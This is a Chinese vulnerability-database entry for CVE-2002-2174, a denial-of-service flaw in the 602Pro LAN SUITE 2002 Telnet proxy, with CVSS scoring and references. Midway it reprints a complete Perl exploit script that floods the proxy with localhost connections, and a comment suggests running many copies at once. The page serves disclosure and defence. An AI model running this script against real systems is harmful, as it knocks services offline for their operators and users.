CVE-2002-2174
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:31
NMCOE    

[原文]The Telnet proxy of 602Pro LAN SUITE 2002 does not restrict the number of outstanding connections to the local host, which allows remote attackers to create a denial of service (memory consumption) via a large number of connections.


[CNNVD]602Pro LAN SUITE 服务拒绝漏洞(CNNVD-200212-778)

        602Pro LAN SUITE 2002版本中的Telnet代理不能限制本地主机的未完成的连接数,远程攻击者可以通过大量的连接导致服务拒绝(内存消耗)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2174
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2174
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-778
(官方数据源) CNNVD

- 其它链接及资源

http://www.iss.net/security_center/static/9768.php
(PATCH)  XF  602pro-telnet-proxy-dos(9768)
http://archives.neohapsis.com/archives/bugtraq/2002-07/0518.html
(UNKNOWN)  BUGTRAQ  20020804 Advisory: Multiple 602Pro LAN SUITE 2002 Denial of Service Attacks

- 漏洞信息

602Pro LAN SUITE 服务拒绝漏洞
中危 未知
2002-12-31 00:00:00 2006-02-14 00:00:00
远程  
        602Pro LAN SUITE 2002版本中的Telnet代理不能限制本地主机的未完成的连接数,远程攻击者可以通过大量的连接导致服务拒绝(内存消耗)。

- 公告与补丁

        

- 漏洞信息 (21694)

602Pro LAN SUITE 2002 Telnet Proxy Localhost Denial Of Service Vulnerability (EDBID:21694)
windows remote
2002-08-03 Verified
0 Stan Bubrouski
N/A [点击下载]
source: http://www.securityfocus.com/bid/5416/info

The 602Pro LAN SUITE 2002 Telnet Proxy is reported to be prone to a denial of service condition. It is possible for proxy users to use the loopback interface to connect to localhost. If a large number of these connections are made concurrently, it is possible to cause a denial of service via resource exhaustion.

#!/usr/bin/perl

#

# lansuite-proxy-DoS.pl - 602Pro LAN SUITE 2002 telnet proxy DoS

#

# Note: Try very high number of connections and run multiple instances

# of the script for quick results.

#

# Date: August 3, 2002

# Author: Stan Bubrouski (stan@ccs.neu.edu)



if (!$ARGV[2]) {

        print "Usage $0 <hostname> <port> <connections>\n\n";

        exit();

}


$host = $ARGV[0];

$port = $ARGV[1];

$numc = $ARGV[2];



use Net::Telnet ();

$t = new Net::Telnet;

$t->open(Host => $host,Port => $port);

foreach(1...$numc) {

        $t->waitfor('/.*host.*/');

        $t->print('localhost:23');

}
		

- 漏洞信息

60106
602Pro LAN SUITE 2002 Telnet Proxy Connection Saturation Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

2002-08-03 Unknow
2002-08-03 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站